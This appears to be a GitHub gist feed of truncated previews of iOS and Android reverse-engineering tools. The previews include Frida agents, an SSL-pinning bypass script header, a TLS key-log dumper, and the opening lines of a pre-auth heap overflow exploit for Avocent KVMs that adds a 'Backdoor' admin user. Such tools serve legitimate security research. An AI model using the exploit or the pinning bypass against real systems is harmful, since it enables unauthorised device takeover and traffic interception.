ApkUnpacker apkunpacker
@miticollo
miticollo / guide.md
Last active July 28, 2024 10:06
How to build frida-server (≥ 16.2.2) for iOS jailbroken devices

Here, I'll show you how to compile frida-server (≥ 16.2.2) for rootful, rootless and RootHide jailbreaks.

Old Instructions

If you want to compile an old version of Frida (< 16.2.2) you can use my old guide.

Build Instructions

Requirements

@aemmitt-ns
aemmitt-ns / asmpwn.py
Last active December 30, 2023 15:08
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks  # python closes out-of-scope sockets
    port = 3211  # port is hardcoded in the binary
    usernm = username.encode()
@jevinskie
jevinskie / example.txt
Created July 14, 2023 02:34
xnu-unsuspend
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *]
-> % sudo taskinfo 'Deliveries Widget'
process: "Deliveries Widget" [30145] [unique ID: 1220404]
architecture: arm64
coalition (type 0) ID: 105936
coalition (type 1) ID: 591
suspend count: 1
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB
run time: 42 s
user/system time (current threads): 0.046565 s / 0.036279 s
@aemmitt-ns
aemmitt-ns / restricted.m
Created May 19, 2023 14:06
program to dump out forbidden classes and selectors in NSPredicates
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>
int main() {
    // Both symbols are private CoreFoundation functions, so they are resolved at runtime via dlsym.
    void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
    NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
    NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
    NSLog(@"Restricted Classes: %@", RestrictedClasses());
    NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
    return 0;
}
@miticollo
miticollo / permissions.py
Created May 9, 2023 01:07
A frida agent to reset all permissions on a specific app. This work is based on https://github.com/FouadRaheb/AppData.
#!/usr/bin/env python3
import json
import frida
from frida.core import Device, Session, Script, ScriptExportsSync
compiler: frida.Compiler = frida.Compiler()
compiler.on("diagnostics", lambda diag: print(f"on_diagnostics: {diag}"))
bundle: str = compiler.build('permissions.ts', compression='terser')
@miticollo
miticollo / child-gating.py
Created April 28, 2023 19:21
A gist to show an example
import threading
from frida_tools.application import Reactor
import frida
class Application:
    def __init__(self):
        self._stop_requested = threading.Event()

How to use O-MVLL with WSL for Android projects

  • Use this guide to integrate the O-MVLL obfuscator using WSL and command line
  • The guide has two parts, the first one explains the installation of Android build tools, the second part presents all the adjustments I needed to make to standard O-MVLL integration process (https://obfuscator.re/omvll/introduction/getting-started/). Read that 'Getting started' guide first.

Preparing WSL for command-line Android development

Based on this article https://dev.to/halimsamy/wsl-for-developers-installing-the-android-sdk-53n9

Installing OpenJDK and Gradle

sudo apt-get update
/**
* Android, iOS (12.0-15.7.3), Linux universal SSLKEYLOG dumper.
*
* Usage:
*
* # For iOS and mac:
* rvictl -s [UDID]
* # Then open Wireshark and select rvi0
*
* # For iOS and not mac:
@aemmitt-ns
aemmitt-ns / funtime.js
Last active December 30, 2023 06:26
funtime: detailed objective-c runtime tracing. ex `python funtime.py -n Messages '-[NSRegularExpression *]'`
const typeMap = {
"c": "char",
"i": "int",
"s": "short",
"l": "long",
"q": "long long",
"C": "unsigned char",
"I": "unsigned int",
"S": "unsigned short",
@incogbyte
incogbyte / mixunpin.js
Last active September 11, 2024 12:57
Frida script to bypass common SSL pinning methods on Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that SSL pinning can be custom; sometimes you need to reverse the app with Ghidra, IDA or a similar tool.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!!